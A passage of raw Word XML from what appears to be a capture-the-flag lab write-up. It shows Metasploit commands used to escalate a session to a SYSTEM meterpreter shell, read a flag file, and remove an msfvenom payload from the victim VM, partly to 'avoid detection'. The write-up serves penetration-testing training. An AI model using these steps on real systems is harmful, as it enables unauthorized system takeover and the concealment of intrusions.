                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0A116" w14:textId="38C08DDA" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:t>You can see that my original exploit from below is actually listed in the suggester results above. The suggester is clearly a more effective option. For this demo we will show the original method instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F2A6E2" w14:textId="77777777" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1"/>
    <w:p w14:paraId="02CDAE65" w14:textId="542B099A" w:rsidR="00D51AF5" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:t>The original route taken is a little more direct.</w:t>
      </w:r>
      <w:r w:rsidR="00D51AF5">
        <w:t xml:space="preserve"> I spent hours searching for different keywords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and combinations</w:t>
      </w:r>
      <w:r w:rsidR="00D51AF5">
        <w:t xml:space="preserve"> until landing on this</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222FAD08" w14:textId="3DFE4215" w:rsidR="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">xploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>NTUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53719F4E" w14:textId="6AB813B5" w:rsidR="00D51AF5" w:rsidRDefault="004C772B" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32D8F0A1" wp14:editId="7738BA71">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1658203</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>98283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="402609" cy="375313"/>
                <wp:effectExtent l="38100" t="0" r="16510" b="62865"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Straight Arrow Connector 32"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="402609" cy="3753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6E7D9" id="Straight Arrow Connector 32" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:130.55pt;margin-top:7.75pt;width:31.7pt;height:29.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" strokecolor="red" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D51AF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6CDEF1" wp14:editId="44B0614F">
            <wp:extent cx="5936615" cy="12280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1228090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D510C26" w14:textId="684E929A" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:t>With these very narrowed down results let’s pick the first one and then start working down the list and see if one works. Start with the first one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B1B61" w14:textId="77777777" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1"/>
    <w:p w14:paraId="0515E942" w14:textId="3B6ED3B8" w:rsidR="00D51AF5" w:rsidRPr="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B7C94" w14:textId="25BD02C0" w:rsidR="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141E72CD" w14:textId="258B7086" w:rsidR="00C46F78" w:rsidRPr="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">set session </w:t>
      </w:r>
      <w:r w:rsidR="00C46F78">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;session ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F3AA9" w14:textId="4EB99ED8" w:rsidR="00D51AF5" w:rsidRPr="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>set lport 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185C4F7" w14:textId="3407D21A" w:rsidR="007278E3" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B975860" w14:textId="63E2341C" w:rsidR="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C3D857" wp14:editId="4E2A8B60">
            <wp:extent cx="5936615" cy="58547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5854700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F60417" w14:textId="2A682244" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:t>We have popped a meterpreter with SYSTEM Privileges!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E1AD9" w14:textId="71620ED7" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Very close to the black flag! We need a shell to navigate to where the flag is. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E05546" w14:textId="6D264057" w:rsidR="007278E3" w:rsidRPr="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007278E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B2E3BE" w14:textId="7CA4D0F7" w:rsidR="007278E3" w:rsidRPr="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007278E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0409579F" w14:textId="25013B59" w:rsidR="007278E3" w:rsidRPr="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007278E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C45D6" w14:textId="4E85B776" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r w:rsidRPr="007278E3">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type “Black Belt Flag.txt”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA84DF" w14:textId="0E168AF2" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F92E21B" wp14:editId="54C7BFD1">
            <wp:extent cx="5247640" cy="2374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7640" cy="2374900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69250A87" w14:textId="65413AFE" w:rsidR="0080047A" w:rsidRDefault="00C46F78" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C46F78">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t xml:space="preserve">BLACK FLAG </w:t>
      </w:r>
      <w:r w:rsidRPr="0080047A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>CAP</w:t>
      </w:r>
      <w:r w:rsidR="0080047A" w:rsidRPr="0080047A">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:highlight w:val="black"/>
        </w:rPr>
        <w:t>TURED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12810ABA" w14:textId="7B853CFC" w:rsidR="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1"/>
    <w:p w14:paraId="41819153" w14:textId="55B39CA8" w:rsidR="0080047A" w:rsidRPr="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080047A">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>5.0 Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668DCC92" w14:textId="24CA562E" w:rsidR="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">During the exploitation process, files are typically sent to the victim machine and some even break code. Even if no code breaking files are present, removing files sent over avoids detection and security complications later. For this we will be removing the msfvenom payload that was sent to the victim machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BBB75C" w14:textId="11DD9258" w:rsidR="00D0043A" w:rsidRDefault="0080047A" w:rsidP="00D0043A">
      <w:r>
        <w:t>In the ssh</w:t>
      </w:r>
      <w:r w:rsidR="00D0043A">
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for richmond go ahead and navigate to the location of the payload and remove the files</w:t>
      </w:r>
      <w:r w:rsidR="00D0043A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABBD8B" w14:textId="5FED96B6" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:r>
        <w:t>If the session is closed, restart it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38935011" w14:textId="77777777" w:rsidR="00D0043A" w:rsidRPr="00A07AAA" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ssh richmond@10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06737C76" w14:textId="77777777" w:rsidR="00D0043A" w:rsidRDefault="00D0043A" w:rsidP="00D0043A">
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158F7C2" w14:textId="4485E6A1" w:rsidR="0080047A" w:rsidRDefault="00D0043A" w:rsidP="00543BB1">
      <w:r>
        <w:t>Otherwise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28E664" w14:textId="60E03FF2" w:rsidR="0080047A" w:rsidRPr="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080047A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd \Users\richmond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160213DD" w14:textId="0B3DE54D" w:rsidR="0080047A" w:rsidRPr="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0080047A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>rm shella2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6092745E" w14:textId="47AB670B" w:rsidR="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1">
      <w:r w:rsidRPr="0080047A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159CE406" w14:textId="7E26E14E" w:rsidR="0080047A" w:rsidRDefault="0080047A" w:rsidP="00543BB1"/>
    <w:p w14:paraId="28557CFF" w14:textId="77777777" w:rsidR="009977F5" w:rsidRDefault="009977F5" w:rsidP="00543BB1"/>
    <w:p w14:paraId="46084AA5" w14:textId="6082348D" w:rsidR="00D0043A" w:rsidRPr="0080047A" w:rsidRDefault="00D0043A" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">Bonus: </w:t>
      </w:r>
      <w:r w:rsidR="009977F5">
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>ou can also simply roll back the victim virtual machine to a previous snapshot to reset the lab.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D0043A" w:rsidRPr="0080047A" w:rsidSect="001F43CD">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57242" w14:textId="77777777" w:rsidR="00155F06" w:rsidRDefault="00155F06" w:rsidP="001F43CD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="180570EC" w14:textId="77777777" w:rsidR="00155F06" w:rsidRDefault="00155F06" w:rsidP="001F4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8E89" w14:textId="77777777" w:rsidR="001F43CD" w:rsidRDefault="001F43CD" w:rsidP="00E847C9">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4550"/>
        <w:tab w:val="left" w:pos="5818"/>
      </w:tabs>
      <w:ind w:right="260"/>
      <w:jc w:val="center"/>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9D92694" w14:textId="77777777" w:rsidR="001F43CD" w:rsidRDefault="001F4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80BEC" w14:textId="77777777" w:rsidR="00155F06" w:rsidRDefault="00155F06" w:rsidP="001F43CD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00B3EE49" w14:textId="77777777" w:rsidR="00155F06" w:rsidRDefault="00155F06" w:rsidP="001F4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16D25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA988A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5D8801D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B1BE635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60270899"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2844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F34989"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="96D84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9C156E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C922D14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6B893E19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="115EB8E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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6C390B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0200468">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="694964024">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="191460637">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1579707243">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1522476320">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2059353220">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="373967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3CD"/>
    <w:rsid w:val="00005F58"/>
    <w:rsid w:val="000371E0"/>
    <w:rsid w:val="000C35CA"/>
    <w:rsid w:val="0012333F"/>
    <w:rsid w:val="00137EE2"/>
    <w:rsid w:val="00155F06"/>
    <w:rsid w:val="001F43CD"/>
    <w:rsid w:val="001F761C"/>
    <w:rsid w:val="002408F7"/>
    <w:rsid w:val="00274209"/>
    <w:rsid w:val="002A60AE"/>
    <w:rsid w:val="004C772B"/>
    <w:rsid w:val="00543BB1"/>
    <w:rsid w:val="005B1744"/>
    <w:rsid w:val="00641B0C"/>
    <w:rsid w:val="006A4EC8"/>
    <w:rsid w:val="0072634E"/>
    <w:rsid w:val="007278E3"/>
    <w:rsid w:val="007754A9"/>
    <w:rsid w:val="007A65E3"/>
    <w:rsid w:val="007D6039"/>
    <w:rsid w:val="0080047A"/>
    <w:rsid w:val="008836C3"/>
    <w:rsid w:val="008A4306"/>
    <w:rsid w:val="009977F5"/>
    <w:rsid w:val="009A4C83"/>
    <w:rsid w:val="00A07AAA"/>
    <w:rsid w:val="00A75B5E"/>
    <w:rsid w:val="00B02E77"/>
    <w:rsid w:val="00B168C9"/>
    <w:rsid w:val="00B43C57"/>
    <w:rsid w:val="00C46F78"/>
    <w:rsid w:val="00CC1509"/>
    <w:rsid w:val="00CC602E"/>
    <w:rsid w:val="00D0043A"/>
    <w:rsid w:val="00D51AF5"/>
    <w:rsid w:val="00D60466"/>
    <w:rsid w:val="00D94865"/>
    <w:rsid w:val="00DC3F0D"/>
    <w:rsid w:val="00E847C9"/>
    <w:rsid w:val="00ED31B1"/>
    <w:rsid w:val="00EF430B"/>
    <w:rsid w:val="00F15F0A"/>
    <w:rsid w:val="00F408C6"/>
    <w:rsid w:val="00F55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D13B1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E84AE475-839D-4823-B58A-63D0AD0B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4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43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F43CD"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:kern w:val="0"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F4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3CD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F4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3CD"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007D6039"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC602E"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CC6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Coding Dojo</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Dojo</dc:title>
  <dc:subject>Robert Christopherson</dc:subject>
  <dc:creator>Robert Christopherson</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Robert Christopherson</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <cp:lastPrinted>2023-01-17T01:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-14T20:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-17T03:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>